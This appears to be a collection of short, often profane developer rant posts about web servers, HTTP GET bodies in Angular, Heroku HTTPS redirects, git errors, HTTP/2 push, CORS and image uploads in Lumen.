Now you can run a CVS, DC Hub, DHCP, UPnP, DNS, Dynamic DNS, eDonkey, Email (POP3 / SMTP), FTP Proxy, FTP, FTPS, Flash Policy, Git, Gopher, HTTP Snoop, ICAP, IRC Bot, IRC, ISCSI, Icecast, LPD, Load Balancer, MQTT, Memcached, MongoDB, MySQL, NFS, NTP, NZB Client, Napster, PHP and Lighttpd, PXE, Port Forwarder, Proxy, RTMP, Remote Control, Rsync, SMB/CIFS, SMPP, SMS, Socks, SFTP, SSH, Server Monitor, Stomp, Styx, Syslog, TFTP, Telnet, Test, Time, Torrent Client, Torrent Tracker, Trigger, UPnP Port Mapper, VNC, Wake On Lan, Web, WebDAV, WebSocket, X11 and/or XMPP server!

</quote>

GET Requests with a BODY as a payload are legit and stop living in denial!
TALKING TO YOU ANGULAR!

I'm fucking sick of seeing ignorant people(on SO or GitHub) coming up with the generic advice, on HTTP GET issues with having a BODY as a payload, to don't do that or you shouldn't, yadayadayada.

It's not a fucking issue at all in general, because as RFC-7231(https://tools.ietf.org/html/...) sais:
"A payload within a GET request message has no defined semantics; sending a payload body on a GET request might cause some existing implementations to reject the request."

So, if your fucking server can't handle them(aka living in the past), [rest] in peace and suck it up!
(ps, I happen to use modern servers)

But why should you limit a fucking front-end framework(ex. Angular) in the first plate to being able to send such requests?!
It's a moronic limitation and the person or team responsible for it are at least clueless and as far the issue has reappeared through time, for how old is Angular, they didn't move an inch.

FFS! having nodejs server on heroku, added certificate successfully for https, yet when going to www.example.com it uses http on prod and maintanence page while example.com goes to https.

All my attempts to catch http connection failed.

This is the definition of me wanting to bang my keyboard and problem autosolves itself while I am doing it!

Where is the my one click and everything is ready. I want to code back end and front end not spend 2 days trying to figure out https bullshit for unknown reason.

I needed a tool that was super simple to transfer email from a non-cpanel server to a new WHM-based VPS. Ended up coding one and launched http://transfermyemail.ca - have had a few server companies jump on board because they needed migration tools too! Was it worth it from a development time point of view? Not yet...maybe next year :)

You know you are done when stackoverflow gives upon you: http://stackoverflow.com/questions/...

So I decided to run a scheduled job on the server just before everyone starts using the it.

https://i.imgflip.com/2i02zy.jpg

git branch -r
origin/204/match-dsteem-on-sign-transaction
origin/305-support-hive-legacy-api
origin/307-call-async
origin/72-http-socket-support
origin/HEAD -> origin/dev
origin/appbase-http
origin/chore/fix-ws
origin/default-server

but

git push --follow-tags https://github.com/lopudesigns/... --set-upstream origin dev
fatal: refs/remotes/origin/HEAD cannot be resolved to branch.

wut

I created a Discord server which is focused on OpenBSD and thought that some of you might like to be some of the first -- or only -- members of this Discord server.
Suggestions for server improvements from those who do join would be appreciated.

One can join the Discord server by visiting http://discord.gg/zeGDz5.

Anyone here use the NodeJS HTTP/2 API? I started working with it the other day and I can get static files served fine with it but when I try and use it's push feature to "bundle" additional resources that the page will need, it doesn't seem to work, the client still requests the resources from the server instead of looking in the "push" cache. Also the load time seems longer when using http/2 vs 1, was wondering if anyone else had come across these issues and found workarounds. P.S. - I'm using Chrome to test on, with https://localhost and some self-signed certs as http/2 isn't implemented in browser unless using https

Can somebody give working example how to solve

Access to XMLHttpRequest at 'localhost:8000/index.php/api/companies/1/logo' from origin 'http://localhost:8080' has been blocked by CORS policy: Cross origin requests are only supported for protocol schemes: http, data, chrome, chrome-extension, chrome-untrusted, https.

this error is talked so much but no working solution I can find. Maybe it is somewhere but cannot find so far in the internet trash.

Nginx server.

Not by installing chrome plugin, because other people would also need to install it. Thats not a solution.

¡¡Good news!! Finally solved the image upload problem with lumen and angular. It happens that, even the $request in Lumen was "empty" it turned out that the actual image file was a binary object inside the Lumen $request variable that didn't render because the browser, postman and everything I tried couldn't understand it (maybe something to do with the Content-Type). I figured out and solved it, now I can easily save, delete and even modify images when are in the server side.

One more thing... My code was fine the whole time, l mean like, 3 days of finding a big that doesn't exists haha

Everyday we learn some new si*t

For those who don't know what I'm talking about, the story is right here:
http://stackoverflow.com/questions/...

PS: thanks guys, I really appreciate your comments: @champion01 @itsdaniel0 @dfox @joetj

!rant

TIL they created an open source e-mail protocol, JMAP (info at http://jmap.io), based on IMAP. The problem is, there is no client nor server​ that actually uses this. Do you know if they will ever develop one?